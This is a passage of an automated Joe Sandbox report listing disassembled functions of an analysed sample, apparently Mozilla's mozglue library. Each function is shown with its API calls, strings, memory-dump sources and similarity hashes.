Opcode ID: bb96c73d576de1e5d2f844247f1374ee2435fb7e757a774849d187c51a84d034
Instruction ID: 1b8bb2b01b75592db35525bbc8c96e684b88d07ae4a8c87de7a569f89bee121e
Opcode Fuzzy Hash: bb96c73d576de1e5d2f844247f1374ee2435fb7e757a774849d187c51a84d034
Instruction Fuzzy Hash: 5FE017A595830257DA10B7F5BC56F2B7A8C5B9430EF00092CFE08C7212EE25F8548265

Function 009688D0 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 009688F2

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: a06f003520d71ed34b82f81db1039de1d34255f452b08268367b27144f8149f3
Instruction ID: a659bea80073b4c60964a47f5b01877c007077076167e0a5ecb647e515fbd65a
Opcode Fuzzy Hash: a06f003520d71ed34b82f81db1039de1d34255f452b08268367b27144f8149f3
Instruction Fuzzy Hash: FA01F67490420CEBCB09CF98D595BADBBB5EF04308F248188E9496B380C7746F84EB46

Non-executed Functions

Function 6C685440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C685492
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6854A8
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6854BE
__Init_thread_footer.LIBCMT ref: 6C6854DB

Part of subcall function 6C6AAB3F: EnterCriticalSection.KERNEL32(6C6FE370,?,?,6C673527,6C6FF6CC,?,?,?,?,?,?,?,?,6C673284), ref: 6C6AAB49
Part of subcall function 6C6AAB3F: LeaveCriticalSection.KERNEL32(6C6FE370,?,6C673527,6C6FF6CC,?,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6AAB7C

Part of subcall function 6C6ACBE8: GetCurrentProcess.KERNEL32(?,6C6731A7), ref: 6C6ACBF1
Part of subcall function 6C6ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6731A7), ref: 6C6ACBFA

GetCurrentThreadId.KERNEL32 ref: 6C6854F9
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C685516
GetCurrentThreadId.KERNEL32 ref: 6C68556A
AcquireSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C685577
moz_xmalloc.MOZGLUE(00000070), ref: 6C685585
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C685590
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C6855E6
ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C685606
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C685616

Part of subcall function 6C6AAB89: EnterCriticalSection.KERNEL32(6C6FE370,?,?,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284), ref: 6C6AAB94
Part of subcall function 6C6AAB89: LeaveCriticalSection.KERNEL32(6C6FE370,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6AABD1

GetCurrentThreadId.KERNEL32 ref: 6C68563E
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C685646
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C68567C
free.MOZGLUE(?), ref: 6C6856AE

Part of subcall function 6C695E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C695EDB
Part of subcall function 6C695E90: memset.VCRUNTIME140(ewml,000000E5,?), ref: 6C695F27
Part of subcall function 6C695E90: LeaveCriticalSection.KERNEL32(?), ref: 6C695FB2

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C6856E8
GetCurrentThreadId.KERNEL32 ref: 6C685707
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C68570F
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C685729
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C68574E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C68576B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C685796
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C6857B3
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C6857CA

Strings

[I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C685BBE
MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C685749
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C685AC9
GeckoMain, xrefs: 6C685554, 6C6855D5
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C68548D
- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C685D24
[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C685C56
- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C685D01
MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C6856E3
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C6857C5
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C685766
[I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C685717
- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C685D1C
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C6854A3
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C6854B9
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C685791
MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C6857AE
[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C685B38
- MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C685CF9
- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C685D2B
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C685724
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C68584E
MOZ_PROFILER_STARTUP, xrefs: 6C6855E1
[I %d/%d] profiler_init, xrefs: 6C68564E
MOZ_BASE_PROFILER_HELP, xrefs: 6C685511

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
API String ID: 3686969729-1266492768
Opcode ID: bc4fc1f6f4e794a296228b959f13cc39e8699cb4ce539d2cc5da9f8e1cb31d9f
Instruction ID: 2c3640683dd86a3f0621a85368176c7ad85a3fdc5b01776cda0ff575a2627e02
Opcode Fuzzy Hash: bc4fc1f6f4e794a296228b959f13cc39e8699cb4ce539d2cc5da9f8e1cb31d9f
Instruction Fuzzy Hash: 062223B09053009BFB009F65989465AB7F6AF8734CF04452AE96797B41E731C84ACB6F

Function 6C686C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C686CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C686D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C686D26

Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C686D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C686D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C686D73
free.MOZGLUE(00000000), ref: 6C686D80
CertGetNameStringW.CRYPT32 ref: 6C686DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C686DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C686DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C686DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C686E10
CryptMsgClose.CRYPT32(00000000), ref: 6C686E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C686E34
CreateFileW.KERNEL32 ref: 6C686EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C686F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C686F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C68709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C687103
free.MOZGLUE(00000000), ref: 6C687153
CloseHandle.KERNEL32(?), ref: 6C687176
__Init_thread_footer.LIBCMT ref: 6C687209
__Init_thread_footer.LIBCMT ref: 6C68723A
__Init_thread_footer.LIBCMT ref: 6C68726B
__Init_thread_footer.LIBCMT ref: 6C68729C
__Init_thread_footer.LIBCMT ref: 6C6872DC
__Init_thread_footer.LIBCMT ref: 6C68730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C6873C2
VerSetConditionMask.NTDLL ref: 6C6873F3
VerSetConditionMask.NTDLL ref: 6C6873FF
VerSetConditionMask.NTDLL ref: 6C687406
VerSetConditionMask.NTDLL ref: 6C68740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C68741A
moz_xmalloc.MOZGLUE(?), ref: 6C68755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C687568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C687585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C687598
free.MOZGLUE(00000000), ref: 6C6875AC

Part of subcall function 6C6AAB89: EnterCriticalSection.KERNEL32(6C6FE370,?,?,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284), ref: 6C6AAB94
Part of subcall function 6C6AAB89: LeaveCriticalSection.KERNEL32(6C6FE370,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6AABD1

Strings

SHA256, xrefs: 6C686EC0
(, xrefs: 6C68768A
CryptCATAdminReleaseCatalogContext, xrefs: 6C6872C8
wintrust.dll, xrefs: 6C6872CD

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: f5c5682dc257ba5b62027e1fbcdfcb81fa2bf4a0b74f17c236b180f09efaa30a
Instruction ID: 2422c8dc4d9a572f5e4a74baa2ee5fd10160f6e858a89d2492ba0624c01e92dd
Opcode Fuzzy Hash: f5c5682dc257ba5b62027e1fbcdfcb81fa2bf4a0b74f17c236b180f09efaa30a
Instruction Fuzzy Hash: 1252E5B1A012189FEB21CF65CC84BAA77F9EF46704F004199F529A7640DB70AF85CF69

Function 6C6B0DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C6B0F1F
LeaveCriticalSection.KERNEL32(?), ref: 6C6B0F99
memcpy.VCRUNTIME140(?,?,?), ref: 6C6B0FB7
EnterCriticalSection.KERNEL32(?), ref: 6C6B0FE9
memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C6B1031
LeaveCriticalSection.KERNEL32(?), ref: 6C6B10D0
EnterCriticalSection.KERNEL32(?), ref: 6C6B117D
memset.VCRUNTIME140(?,000000E5,?), ref: 6C6B1C39
EnterCriticalSection.KERNEL32(6C6FE744), ref: 6C6B3391
LeaveCriticalSection.KERNEL32(6C6FE744), ref: 6C6B33CD
LeaveCriticalSection.KERNEL32(?), ref: 6C6B3431
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6B3437

Strings

<jemalloc>, xrefs: 6C6B3941, 6C6B39F1
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C6B37BD
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C6B37D2
: (malloc) Unsupported character in malloc options: ', xrefs: 6C6B3A02
MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C6B3793
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C6B3559, 6C6B382D, 6C6B3848
Compile-time page size does not divide the runtime one., xrefs: 6C6B3946
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C6B37A8
MALLOC_OPTIONS, xrefs: 6C6B35FE
MOZ_CRASH(), xrefs: 6C6B3950

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3040639385-4173974723
Opcode ID: 3d47ea64b5e60ec0ba958f380313297de42d4eeac17864d25234720cd5f6b160
Instruction ID: 0822ba19d3a49275f7f8fa28e7f1d0801e8a9593246d08842f387c7d75d6eaef
Opcode Fuzzy Hash: 3d47ea64b5e60ec0ba958f380313297de42d4eeac17864d25234720cd5f6b160
Instruction Fuzzy Hash: 7C53AF72A057019FC304CF29C580716FBE1BF89328F29C66DE869AB791D771E852CB85

Function 6C6D34A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON

Download Yara Rule

APIs

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3527
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D355B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D35BC
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D35E0
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D363A
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3693
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D36CD
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3703
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D373C
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3775
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D378F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3892
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D38BB
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3902
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3939
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3970
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D39EF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3A26
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3AE5
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3E85
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3EBA
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3EE2

Part of subcall function 6C6D6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C6D61DD
Part of subcall function 6C6D6180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C6D622C

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D40F9
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D412F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D4157

Part of subcall function 6C6D6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C6D6250
Part of subcall function 6C6D6180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6D6292

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D441B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D4448
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6D484E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6D4863
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6D4878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6D4896
free.MOZGLUE ref: 6C6D489F

Strings

, xrefs: 6C6D4CD2

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: floor$free$malloc$memcpy
String ID:
API String ID: 3842999660-3916222277
Opcode ID: 16c303b84c9d71a64ab3d12022ed5208c692d5c7e7b5485fe28dae8c259428b1
Instruction ID: 1fc5096b9c47ae93ba167305b6364d55eea607932488f794de885e61bc2d754a
Opcode Fuzzy Hash: 16c303b84c9d71a64ab3d12022ed5208c692d5c7e7b5485fe28dae8c259428b1
Instruction Fuzzy Hash: BFF25D74908B808FC761CF29C08469AFBF1FFCA344F118A5ED99997711DB71A886CB46

Function 6C6864C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C6864DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C6864F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C686505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C686518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C68652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C68671C
GetCurrentProcess.KERNEL32 ref: 6C686724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C68672F
GetCurrentProcess.KERNEL32 ref: 6C686759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C686764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C686A80
GetSystemInfo.KERNEL32(?), ref: 6C686ABE
__Init_thread_footer.LIBCMT ref: 6C686AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C686AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C686AF7

Strings

nvdxgiwrap.dll, xrefs: 6C686513
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C686798
detoured.dll, xrefs: 6C6864DA
_etoured.dll, xrefs: 6C6864ED
nvd3d9wrap.dll, xrefs: 6C686500
user32.dll, xrefs: 6C686526

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: e4baa4db70cb43ec8f51baeedc8ed62435e9ed57382cbbd13ef2c4e4829936cf
Instruction ID: 4ecc9554f54387ec0bd99ce1c134d618cbeb9c150f6b640fb5754b8f5f346cbc
Opcode Fuzzy Hash: e4baa4db70cb43ec8f51baeedc8ed62435e9ed57382cbbd13ef2c4e4829936cf
Instruction Fuzzy Hash: A5F103709162199FCF20CF25DC88BDAB7B5AF46308F1442D9D819A3680D731EE85CFA9

Function 6C6DC4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6DC5F9
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6DC6FB
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C6DC74D
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C6DC7DE
memset.VCRUNTIME140(?,00000000,00004014), ref: 6C6DC9D5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6DCC76
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6DCD7A
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6DDB40
memcpy.VCRUNTIME140(?,?,?), ref: 6C6DDB62
memcpy.VCRUNTIME140(?,?,?), ref: 6C6DDB99
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6DDD8B
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6DDE95
memcpy.VCRUNTIME140(?,?,?), ref: 6C6DE360
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6DE432
memcpy.VCRUNTIME140(?,?,?), ref: 6C6DE472

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction ID: d966846b9019b01c1569232ee8d4dc98feab5bf0201caf535b8ac6994edd9795
